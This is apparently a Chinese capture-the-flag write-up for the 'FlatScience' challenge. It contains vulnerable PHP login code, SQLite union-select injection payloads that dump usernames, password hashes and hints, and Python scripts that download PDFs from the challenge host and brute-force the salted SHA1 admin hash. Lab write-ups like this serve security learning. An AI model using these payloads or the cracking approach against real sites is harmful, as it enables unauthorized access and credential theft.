zoukankan      html  css  js  c++  java
  • FlatScience(sqlite3注入|python->读取PDF)

    进入login.php页面,F12后发现了

    按照文本的提示,我们get传递一下debug参数

    拿到login.php源码:

    <?php
    ob_start();
    ?>
    
    
    <?php
    if(isset($_POST['usr']) && isset($_POST['pw'])){
            $user = $_POST['usr'];
            $pass = $_POST['pw'];
    
            $db = new SQLite3('../fancy.db');
            $res = $db->query("SELECT id,name from Users where name='".$user."' and password='".sha1($pass."Salz!")."'");
    
        if($res){
            $row = $res->fetchArray();
        }
        else{
            echo "<br>Some Error occourred!";
        }
    
        if(isset($row['id'])){
                setcookie('name',' '.$row['name'], time() + 60, '/');
                header("Location: /");
                die();
        }
    
    }
    
    if(isset($_GET['debug']))
    highlight_file('login.php');
    ?>

    审计代码得知数据库采用的是SQLite3,post参数没有过滤

    构造payload获取表名

    url解码得到:

    +CREATE+TABLE+Users(id+int+primary+key,name+varchar(255),password+varchar(255),hint+varchar(255))

    获取用户名

     usr='union select 1,group_concat(name) from Users--+ &pw=1

    获取密码

     usr='union select 1,group_concat(password) from Users--+ &pw=1

     得到admin的密码为:3fab54a50e770d830c0416df817567662a9dc85c

    查找hint字段

    usr='union select 1,group_concat(hint) from Users--+ &pw=1

    解码得到:

    | name   | hint                          |
    | ------ | ----------------------------- |
    | admin  | my fav word in my fav paper?! |
    | fritze | my love is…?                  |
    | hansi  | the password is password      |

    发现只能找到admin的密码了,线索是作者最爱的单词:

    shal(单词+Salz)=3fab54a50e770d830c0416df817567662a9dc85c

    使用前辈的脚本,下载pdf并分析出flag

    #下载pdf
    import urllib.request
    import re
    import os
    
    
    # open the url and read
    def getHtml(url):
        page = urllib.request.urlopen(url)
        html = page.read()
        page.close()
        return html
    
    def getUrl(html):
        reg = r'(?:href|HREF)="?((?:http://)?.+?.pdf)'
        url_re = re.compile(reg)
        url_lst = url_re.findall(html.decode('utf-8'))
        return(url_lst)
    
    def getFile(url):
        file_name = url.split('/')[-1]
        u = urllib.request.urlopen(url)
        f = open(file_name, 'wb')
    
        block_sz = 8192
        while True:
            buffer = u.read(block_sz)
            if not buffer:
                break
    
            f.write(buffer)
        f.close()
        print ("Sucessful to download" + " " + file_name)
    
    #指定网页
    root_url = ['http://220.249.52.133:35791/1/2/5/',
                'http://220.249.52.133:35791/']
    
    raw_url = ['http://220.249.52.133:35791/1/2/5/index.html',
                'http://220.249.52.133:35791/index.html'
               ]
    #指定目录
    os.mkdir('ldf_download')
    os.chdir(os.path.join(os.getcwd(), 'ldf_download'))
    for i in range(len(root_url)):
        print("当前网页:",root_url[i])
        html = getHtml(raw_url[i])
        url_lst = getUrl(html)
    
        for url in url_lst[:]:
            url = root_url[i] + url
            getFile(url)
    #分析脚本
    from
    io import StringIO #python3 from pdfminer.pdfpage import PDFPage from pdfminer.converter import TextConverter from pdfminer.converter import PDFPageAggregator from pdfminer.layout import LTTextBoxHorizontal, LAParams from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter import sys import string import os import hashlib import importlib import random from urllib.request import urlopen from urllib.request import Request def get_pdf(): return [i for i in os.listdir("./ldf_download/") if i.endswith("pdf")] def convert_pdf_to_txt(path_to_file): rsrcmgr = PDFResourceManager() retstr = StringIO() laparams = LAParams() device = TextConverter(rsrcmgr, retstr, laparams=laparams) fp = open(path_to_file, 'rb') interpreter = PDFPageInterpreter(rsrcmgr, device) password = "" maxpages = 0 caching = True pagenos=set() for page in PDFPage.get_pages(fp, pagenos, maxpages=maxpages, password=password,caching=caching, check_extractable=True): interpreter.process_page(page) text = retstr.getvalue() fp.close() device.close() retstr.close() return text def find_password(): pdf_path = get_pdf() for i in pdf_path: print ("Searching word in " + i) pdf_text = convert_pdf_to_txt("./ldf_download/"+i).split(" ") for word in pdf_text: sha1_password = hashlib.sha1(word.encode('utf-8')+'Salz!'.encode('utf-8')).hexdigest() if (sha1_password == '3fab54a50e770d830c0416df817567662a9dc85c'): print ("Find the password :" + word) exit() if __name__ == "__main__": find_password()

    得到admin的密码,登录admin.php页面获取flag

     

  • 相关阅读:
    pytest.mark.parametrize里面indirect参数详细解释
    linux环境安装python环境
    gitlab怎么给别人新增项目权限
    VMware虚拟机下的CentOS7如果Ping不通百度,解决办法
    ip configuration could not be reserved (no available address timeout etc.)虚拟机连接不上网卡解决办法
    虚拟机安装教程
    auto_now与auto_now_add之间的区别
    【二分答案】洛谷P2678 [NOIP2015 提高组] 跳石头/P1824 进击的奶牛/P2440木材加工/P1873 砍树
    团体程序设计天梯赛PTA L2-021点赞狂魔
    团体程序设计天梯赛PTA L2-020功夫传人
  • 原文地址:https://www.cnblogs.com/luocodes/p/13864124.html
Copyright © 2011-2022 走看看